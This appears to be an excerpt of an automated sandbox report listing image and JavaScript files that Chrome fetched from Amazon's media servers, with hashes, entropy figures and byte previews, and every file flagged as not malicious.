                                                                                                                                                                                                                                                                      Preview:<svg version="1.1" xmlns="http://www.w3.org/2000/svg" focusable="false" aria-hidden="true" viewBox="0 0 19 19" shape-rendering="geometricPrecision"><path d="M9.5,1.325L12.104,6.581L17.922,7.423L13.711,11.511L14.706,17.286L9.5,14.56L4.293,17.286L5.288,11.511L1.077,7.423L6.895,6.581L9.5,1.325Z" style="fill:url(#_starGradient_7ojuhn2cj)"></path><path d="M9.5,1.325L12.104,6.581L17.922,7.423L13.711,11.511L14.706,17.286L9.5,14.56L4.293,17.286L5.288,11.511L1.077,7.423L6.895,6.581L9.5,1.325Z" style="fill:none;stroke:rgb(162,106,0);stroke-width:1"></path><defs><linearGradient id="_starGradient_7ojuhn2cj" x1="0" y1="0" x2="1" y2="0" gradientUnits="userSpaceOnUse" gradientTransform="matrix(7.07124e-16,11.5482,-11.5482,7.07124e-16,9.4995,5.53952)"><stop offset="0" style="stop-color:rgb(255,206,0);stop-opacity:1"></stop><stop offset="1" style="stop-color:rgb(255,167,0);stop-opacity:1"></stop></linearGradient></defs></svg>
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 308x320, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):20515
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9713436587613105
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:Hy+M1a7c9EhH9krSNxVNv0J2ZVhbumZNpnW3oqo9xc+9fEpwH1VWGT30JKS:S+M1aBirCx/s0ZVhY+Ui1sGoJKS
                                                                                                                                                                                                                                                                      MD5:C241860F1831616738029A27A968D291
                                                                                                                                                                                                                                                                      SHA1:3DA653D4A65FF903B50305B4207D5A8A05BF3439
                                                                                                                                                                                                                                                                      SHA-256:974118AEE66EC740BFF867ACA05C4EE5D9238BD1BE4CD9B5D61AEA78AF7B9E77
                                                                                                                                                                                                                                                                      SHA-512:D90678749D479593BDA3485B0165C86DC7217FEB55BE0CB6862F7FADFA2F0ED41CAE613CB6DA7165F42897533770F0D25510C9AE76A9035BC704587D3A185C95
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@.4.."..........6...................................................................X............|.....T..$...17`......................d].]L..SR>.s...v.C.q......2.....$^.R..;..@.....}..UZX.*.......+M4..&........=.4k.q...X..?.w.}^.i.T)^gj...:q...Kw.3......&.....[...3..|....J<../..TrL.8.....b....B&.Smmb.M..((.R...6<../A...kq.....XG..Ip....).m.-;.n}.H.....3+.7K...v.k.!....n|.I....4nx....g.....C..}..~..c.az..Tm.^.G$........uz.:kk.n...u...8BO..q.Q{..<...9....Bc..o).*...I..w.<.....<...>}k....K..yt......$o....[Snmc.Q.9...9.Df....M.K..k.S.Ww.S^.'%...Z6|.T._W..].....J.m.F..5..%...u.=j..7.....9.@.|"..WG....iUN..M5..37.^..JV..a..)J.9..kG6s.I`[.f.M3;.t......r....;.>W`.>..;l.f..[.oU.U.Vc...2........\..5.k.....8..k..V.....2.6-*.d.r.....h..O.Y...5...[?....1.-g..}6...C..:.z\........GK..;.....'..?N&$
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 251x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):12724
                                                                                                                                                                                                                                                                      Entropy (8bit):7.942690940344395
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:BwDB+McMVz1my9Vc3CiNwgLj+at90Y18ofx9:mDfB1LY3CtgmatPqs7
                                                                                                                                                                                                                                                                      MD5:83D92C6A7E4CD7CE6A625468A40BDC23
                                                                                                                                                                                                                                                                      SHA1:ABFD556C1EDAEFF53E77D6AB25BF67AB064214EA
                                                                                                                                                                                                                                                                      SHA-256:3E6EB6A04010DAC80A481CBC276B215A7823DECBE7D662578D8247879BA7F2DA
                                                                                                                                                                                                                                                                      SHA-512:78F9FE55C5631279335953A7C465B26215EA0A12D517B37D523702C66D6044C3C91B03538A465F40A0875B81FE168047DD9004DB47350858785696D607168720
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/51H4u4crV3L._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3................................................................i!%.L!...?.^w..Q.=..M...5..)}..........F.X[....n.$...HI!$.f.6.J.].n..}.1V..j}.....-..hH...=..N...F......|..`..BI.$$..F4..F.T..u.5.}.?.e..E.6..oFM...%...>M~./C..<..avT.zr........H_?P.=.:..D.,....au. ......._B...eN...Jb\..j.cv5....%.....y..o.......O...y.2...T.K.7.D.H>...~......o.,.8C...s..Z......'..Yx..a.l7.g_..I....?9.+.....+..j.....y......VI.'....:...+E...VrK>..-.....n6zFVm.G.wb.J[)..U..@O.c .Y..8.c.e......ZF....Ee......5....r.kozS....S....a.X..~.a.k...|.6!..].|..f].4F{..a..._..J .d.^..u.f..%...X\.?C...K..I.....H....If.h.6j5.=8.#..Z.R.=*.....>]....6u...^.Y..BA;"..k.G?..c.k..j.v..R..q}..[..A.^....3c_L....P,[.~T1.{P..}.4K.....aC. ..8y...e{..(.m.>.q,.{K...iYvO.,Q......B..{.I.H..&}/.{.7..*....:..N\|.c...di.sfU
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):10699
                                                                                                                                                                                                                                                                      Entropy (8bit):7.819525252544032
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:M/l4fwJgXrT0Xz5+GDTixvWeZBPMr64Y5ObC6odwFky3rv3YeKcFH/Wg:ilBgXv0D0qeZWCpM24Y5Ztds7rK7g
                                                                                                                                                                                                                                                                      MD5:5397558A515A151660B58366420160D5
                                                                                                                                                                                                                                                                      SHA1:4830FB0B5944DFDCB02234224EDF9A50B430320B
                                                                                                                                                                                                                                                                      SHA-256:99B7C4686A2D0F6FD95B6B0F6661E68AE61CB79094E5B8B7770A6E26B4EDC172
                                                                                                                                                                                                                                                                      SHA-512:773E12AC3669D56B2441FC815A5785ADD897A9EAD636E26ED74AD4358EAE17E148A420B9C9408C785B8FA1F12BB9BF8D6F57FCE61CB5642630B7B3D30943CFAA
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3.............................................................................................................................................................[@...^........................^.d.-....AGt$Tp$tma&!.X..5...1.t...J9...$....s..E9.,Nb.............h.../..>F.g?..=...;y.^...*.e.8.5M.[..>[.i..s8j...N.j..wF.._.+._...+3.N.................K.Gr$}.3.{wS.Z@...M...g..=|..|."m's.:....r....ks./.....d.H....1..Ws..I..............Hq..._b.Yei....;....9{s...W.o.H....G.".V(.....;.a...c.6r..M.c..........f.............#i&5.^.~..._........MvK..."....6mS7...%L.....<iz.o.f..h..vr.....}..........u.................O+.~..}.s..._.w.o.....M....._T..e..w7t.-o:.....>._^R...=..OV.5,...................Nu....%.Y.z......e.u..4.Sh..%.....7..z#..R.Q.%d..l.[L.........Ct...e+................o..?:...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 3000x1200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):134636
                                                                                                                                                                                                                                                                      Entropy (8bit):7.483357550616151
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:8ZedmqANhdjy+pbwlFuvsXCWT9NjJHMbAEPzgXqU3bNNJknK9DbAr3qVjeB:8nqChVpbwWcTDjJsbAlXqUrxkK5o6IB
                                                                                                                                                                                                                                                                      MD5:B91BBF34CEA201588D47D79B7AF81F06
                                                                                                                                                                                                                                                                      SHA1:C0BAE715F3151DAB8DFD444AF1B5661E150B9709
                                                                                                                                                                                                                                                                      SHA-256:521B518BDA5C9489BB02830AD891BBB755C996920CE4ACB953BEB834EC763797
                                                                                                                                                                                                                                                                      SHA-512:972FBC245D370C53DF22D099D25A0E72B6BF578476D92900DC8F6F7348D8AA158444884727633AC389AB713EC24C94DBEC4BA13C4931944DB883D3B68B199121
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71sI-nGOarL._SX3000_.jpg
                                                                                                                                                                                                                                                                      Preview:......Exif..II*...............4GJP........4=jumb....jumdc2pa.........8.q.c2pa...4.jumb...Gjumdc2ma.........8.q.urn:uuid:84ca310c-ccfd-40f5-bdc4-78f8db02bd91.....jumb...)jumdc2as.........8.q.c2pa.assertions.....jumb...&jumdcbor.........8.q.c2pa.actions.....cbor.gactions..factionkc2pa.editedmsoftwareAgentmAdobe FireflyqdigitalSourceTypexShttp://cv.iptc.org/newscodes/digitalsourcetype/compositeWithTrainedAlgorithmicMedia....jumb...(jumdcbor.........8.q.c2pa.hash.data....|cbor.jexclusions..estart..flength.4Idnamenjumbf manifestcalgfsha256dhashX ...2p.J.....=..4.<]].+..B'j.R.cpadI.............jumb...$jumdc2cl.........8.q.c2pa.claim.....cbor.hdc:titleoGenerated imageidc:formatjimage/jpegjinstanceIDx(xmp.iid:5DF93826512911EFA366EADDEB8D89B3oclaim_generatorx6Adobe_Photoshop/25.9.1 adobe_c2pa/0.9.3 c2pa-rs/0.31.0tclaim_generator_info..dnameoAdobe Photoshopgversionf25.9.1.isignaturex.self#jumbf=c2pa.signaturejassertions..curlx'self#jumbf=c2pa.assertions/c2pa.actionsdhashX Ji.....A0x.$...1:..d.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (665)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):276717
                                                                                                                                                                                                                                                                      Entropy (8bit):5.353438150363169
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3072:ZYIIAmk1Xaq/LTCz6PHaL5gYI5B6iSVMbN/vYSidNII:ZjP6LWY6bNXYSidNII
                                                                                                                                                                                                                                                                      MD5:3C66F4A874169140AE54522A79932AB8
                                                                                                                                                                                                                                                                      SHA1:BAE14697244A517EC3626011DB3B7D5842776A1A
                                                                                                                                                                                                                                                                      SHA-256:5B153D0DE899A912C5D4E38C154D2F24D972413566B6C45BB0C26C4B79C46949
                                                                                                                                                                                                                                                                      SHA-512:8FDE61B2CD52D7BD59C745AE11CD0F3B4226C2260B6CF0BB1FF979C8666CCC0DE76AB452ADC40C74A41822C26394AB8085A8EF10947E874998F36BA82657E3A8
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://m.media-amazon.com/images/I/11B2bsTfmvL._RC%7C11Y+5x+kkTL.js,51XFQXG4llL.js,11yKORv-GTL.js,11GgN1+C7hL.js,01+z+uIeJ-L.js,01VRMV3FBdL.js,21BJeD9yjcL.js,01meRT+S4PL.js,11aD5q6kNBL.js,11rRjDLdAVL.js,51LGf0aHP5L.js,11nAhXzgUmL.js,11UNP9ncXuL.js,113pYUOav3L.js,11uo7qXoO3L.js,01VhK3jZdbL.js,21eKR4hvwNL.js,01Q4S7ptbiL.js,51XuQjpKb8L.js,01JYHc2oIlL.js,31nfKXylf6L.js,01ktRCtOqKL.js,21xlsLy-PNL.js,11bEz2VIYrL.js,31o2NGTXThL.js,01rpauTep4L.js,315n+VmgJ3L.js,01tvglXfQOL.js,11jxZ9ouCoL.js,01fBsnBQx0L.js_.js?AUIClients/AmazonUI&88n9Ttiw"
                                                                                                                                                                                                                                                                      Preview:(function(a){var c=window.AmazonUIPageJS||window.P,d=c._namespace||c.attributeErrors,b=d?d("AmazonUIBaseJS@analytics","AmazonUI"):c;b.guardFatal?b.guardFatal(a)(b,window):b.execute(function(){a(b,window)})})(function(a,c,d){"use strict";a.register("a-analytics",function(){function b(b,f){var a=c&&c.ue&&c.ue.count;if(a&&b){var e="aui:"+b;1<arguments.length&&a(e,f);return a(e)}}var a=c&&c.ue&&c.ue.tag;return{increment:function(a,f){if(a){var c=b(a)||0;b(a,c+(f||1))}},count:b,logError:function(a,f,b){c.ueLogError&&.c.ueLogError({message:a},{logLevel:f,attribution:b})},tag:function(b){a&&b&&a("aui:"+b)}}});a.when("a-analytics").register("prv:a-cache-analytics",function(a){function b(a){var b=a.name.indexOf("AUIClients/AmazonUI");a=a.name[b+19];a=a===d||"\x26"===a||"#"===a;return-1!==b&&a}function e(b){a.tag(("script"===b.initiatorType?"js":"link"===b.initiatorType?"css":"unknown")+":"+(b.transferSize===d||b.decodedBodySize===d?"unknown":0===b.transferSize&&0<b.decodedBodySize?"cache":0<b.t
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 158x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):11445
                                                                                                                                                                                                                                                                      Entropy (8bit):7.958304680052471
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:AmTwuddiHpCPNEozfDrI0QHU1juvYC8PLzEOKRSoFrZpTPZJ3wFmAyjSvHOBzhMa:AYwudAHkKIDrhQ01iQC8P/EOc5FrTPZj
                                                                                                                                                                                                                                                                      MD5:EE3AFCA079A55031A80562D06C018554
                                                                                                                                                                                                                                                                      SHA1:21F7EA283680EBF5A66A550A011ED3400231AA0C
                                                                                                                                                                                                                                                                      SHA-256:D2EE6F6B0BF7B2E802A44964E6528CEC7EFD3B92F424D3092DCFC12F3E10AA43
                                                                                                                                                                                                                                                                      SHA-512:3DBBAA5EEFB69E98E761AD3947EA3CF6AEE301AE2FEA85683E70A7A13593318AFE77F3159245FAA6DE4308BA6ACA111484E2C20EA18EC86E8031E718F7E10B5B
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/81bNucIe89L._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!..1A."Q.a#2Ts......35Bqr....$Reu...46Ubt....D..................................................!.1..Aq2.."CQRSar...#B...3............?.{....3..I.J.Z..b..X#.V..i.lN..l..W..2.|....^!.U.....>.>;.a..I...W)hd.rB....u!...S..CJ.0@.\7.,k.v.#f?/..C.?..........8.".\.-.Ii=.x.'.&..J}a...........E.8.*ku]n.#MF..*.Vn.....Vs..m.RH.#xc.n....l......|g..2.|..........e_.R,6.9W..cS.t.Fhg.Q<.*.1G.t...me#.kX..*...M.....|._...."._/....jN.......jZHjK.M]ZR..3fdS.P..B..._`.HZh.....(.....YZ.. ....8...%.2...q6D...g..~....4.t.^.......~..Nc.-.Wr...2F|...Q...n.CJb....4.J.j....>...o....c....}t...../.....)..*b8.8.\..]&=.o.v....a0.0tC...x......U?.I....U?.I.\f'....%_.*=....:.T..]&3..:.UG.I.\f'....%?\.....L..]@?:..o.x.3z..z..u.........z.I.1..o......0..`|....Z....L.T
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):9293
                                                                                                                                                                                                                                                                      Entropy (8bit):7.785923031161295
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:VxQXq9s7jbJ5aGskTKY2Rw8/n8wgap6dL6i8nK6h+1m:V2Xq9sfbJ59s+KYQcap6wbnK6cc
                                                                                                                                                                                                                                                                      MD5:AC6E66BE15CE650A1AC0056F095600AC
                                                                                                                                                                                                                                                                      SHA1:D592AE6D119ABBB91EA98238F39A7BCB0A4E735B
                                                                                                                                                                                                                                                                      SHA-256:1D96E10FC335BDBEE5B264916FCAD945825B301290524249C6C09B8E14AD18B1
                                                                                                                                                                                                                                                                      SHA-512:E03FC16648F088EDFDB69180E79041C852CB8B73D2610E10BFE57357F4848D21672D3698228549A82FCD8E848992A60984A6EC8AFF9A9B1E6967C73F4D5C0BD2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3................................................................X.................................................................................................................................. ...........:9...)YN1|.Jq|.J1..Zqt.Jqt.Z1T.j1V.8...8z...jL..I...A....mx...LM$...M....`.[....7..c.P..........g.T*...i.An....."..4qH....P(P).x...4.9.I.<Rs.....&......;.X.......^...0.'.u/-.o...~.....o.i...G..x..7.4....M.B..pn\i...:x....N.......rm|j..d.*...=.g..............]..U./W7../...DQ"...+.S~..nE......o.X.~A.D......K..e.4.W...1...>.i..t.W.r..t6..`>.......>^Z.gl..7.R.....#./.|.~..."=.L.."L..*L.."M....cH$."I2#.$H.$.~..o...?s.4..k.Yi.....<..t)..5...& ......yb...Wl....zI...$_.|.~=.D...D.."L..I.b.$I. ."4.M....#I.D........<sX.3q....;......<O..M.6.....D.........^..j..".{..../.I...&Di....K"Li.&Di
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x280, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):12366
                                                                                                                                                                                                                                                                      Entropy (8bit):7.940204883956905
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:g8KkT1kBAK3YUhj/5smUSQkZIOtPjd9G1Y:g8Kk5QHIqjxzUkZIOtP501Y
                                                                                                                                                                                                                                                                      MD5:F8B90D0E3577B471CD5241F5F6A713FA
                                                                                                                                                                                                                                                                      SHA1:3F10F0DAB339D3A095EFCCC534E6A1BC3FAF3B89
                                                                                                                                                                                                                                                                      SHA-256:AC0446B370A307639093974BBF6AA150C5B9CF5AF622A45B466A7EAFCFC203B0
                                                                                                                                                                                                                                                                      SHA-512:A54B781D823F439B245BF6F57D6219C9CE06325BC7825D77CB51A3D21A287F790FD6AC381A7BD234108168B11758D346BC8EF5606A1A714E456FEBBD2C6F5549
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........@.."..........5........................................................................^....Pa...1_A..r..6.EHf..[.............m.o.#{q~b.d....wU6kYp.Z}3.h.|s.i.V.59....suw~.].#.a.............i.p..K..|..<...^4.....V..+....9i~.n....-J>..v.Sv..._...@.........u.0~.Sj....w.._N7.|.....-..\./.7.S.\. e...'.{?)............g,.YKwX.f..U.^m_...w../<.Go>x...}...z|..W0..e._S.6.x..F........g3..c.....\...O{.VD.z?l....wu....5s.m]...`.....Lu{<j.<.[f}....~..........V.#.T.xrfvF./..^K6w./.*.h....5..q8.....P.d-|.....SR>...........a..0-....t.....X.5...3p.ZV.n..\o.n.j.gO;.#*..JoZ.L.yJh(...K7.........C............e...q..+8.s[.>./.=^.^.g..v../.n.....,..y..].9.......RU.>Lj.Z.>..j...9|..........9....-.O....-G==%8...9eY3). xNEu.......}.m.N;[&aK....n.~2...idZ.g......#3.%IU...z.R.Q...vU...o.zZ...qUT..U....#-<.2..oY...R..1...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 244x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):19735
                                                                                                                                                                                                                                                                      Entropy (8bit):7.972990422541549
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:/azpK1D2FW50jCnkxMNtSS/oi+nKMvbiRAur5hsTbj8whpmLJWNyY:/YweWOGnWMGS/mKWiRAurXkj8whpUJQ3
                                                                                                                                                                                                                                                                      MD5:66D571D791CF14EC5F301165EFFE85B0
                                                                                                                                                                                                                                                                      SHA1:E64E8D101543BB4D7109D49B5B1974298EBE8B12
                                                                                                                                                                                                                                                                      SHA-256:71856C94C7A971BAC64BB24E54A3C685C812320248995E2A79772CD86300EE41
                                                                                                                                                                                                                                                                      SHA-512:3CE3AFB0E983C3CD677AA193688618625A60B4822EAF85C22C9FE7C4D2AE0FD9F6CC5E1CA8EE6E104E1EB1A1384B2F5D46864198261361C8D7BA59F92F9BF476
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5..................................................................rI$.I$.I.'...H`.oju.....!?d}D-`...{..Lp.SDrg..w@S...s....>y..prwhE.GD.>..<....2.+..V.D`.g..|.l......M..p*..}....G.?L.(..{7....X..c..N.Y.[......]?#c....o...j.......Gw.@n...g.xj|..[uF..M. ...'...Z...|..G~.....+Sv.t.w`p.I..R......vDt.A<.........N..%...5x..g. ...'.........o..;.zY/^m...k......}.k..i.kE....0..<.TeKa#.p.^.......1h........$0^[.2.)..W......gF.i..{..N.].t.^.cC..S.U.?L....(..(...s..z.9....`..M.h.J.M.3..].,.D<.W........I..".`.jVU.q.z.....U...o_.5.6.'..v,^..L...b...j.`.=.....U.8.EM..$.M...;....!..vpU5.....,....u......2r[...NP..%]..r.s....#-..L..)......<......._pI.....s..uNp.......e2.....!.WD6...0....e...&g.2...2.}.^)o.M5 .]V..s+...m...........D...;.+=.../...'..)."7~[.X...,3...}B..W..Z..|c......?.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (570)
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):432197
                                                                                                                                                                                                                                                                      Entropy (8bit):5.568057414400851
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3072:1aDLgUBgILZcluG9E0qb6eBMlJ7ZKkNf4+CQ/908nzWVQ0OA0DK1thHc+VN4kPCm:1egUBJLZclm0qb6evBQ/908nzWVOOxD
                                                                                                                                                                                                                                                                      MD5:19A1855D9BC09CDB49D2FD75C1C06EB3
                                                                                                                                                                                                                                                                      SHA1:E766A044D3711DBD6758C10F8054DBB27AD9F60F
                                                                                                                                                                                                                                                                      SHA-256:A28FD21254051E68E59B6CCA2024DF3E1979924C23AF76F04BC37B9C75BF10A7
                                                                                                                                                                                                                                                                      SHA-512:0CD97DC30762228CE5B436F11C51AF229E97EC4A9DB9FDCB2176EFBAD357B634C1D10CB86DB70E4F5EB33C146A8359439446C7663071CA0DD893E611BCF5E3E9
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:(function(q){var x=window.AmazonUIPageJS||window.P,F=x._namespace||x.attributeErrors,A=F?F("QuantitySelectorAssets",""):x;A.guardFatal?A.guardFatal(q)(A,window):A.execute(function(){q(A,window)})})(function(q,x,F){function A(n){var f=!1;q.now(n).execute("qsAssetDuplicationGuard",function(a){f=!!a});return f}function L(n,f){if(!A(n))try{q.register(n,f)}catch(a){if(!a.message.includes("reregistered by QuantitySelectorAssets"))throw a;}}function Da(){var n=arguments;return{register:function(f,a){if(!A(f))try{q.when.apply(q,.n).register(f,a)}catch(c){if(!c.message.includes("reregistered by QuantitySelectorAssets"))throw c;}},execute:function(f,a){q.when.apply(q,n).execute(f,a)}}}L("QSAssetDuplicationGuard",function(){return{register:L,when:Da}});"use strict";q.when("QSAssetDuplicationGuard").execute("qsAUIDeps-main-duplication-guard",function(n){n.when("A","QuantitySelectorConstants","a-util").execute("qsAUIDeps-main",function(f,a,c){function h(){w&&w.enableCheckoutCompatibility&&g()}funct
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
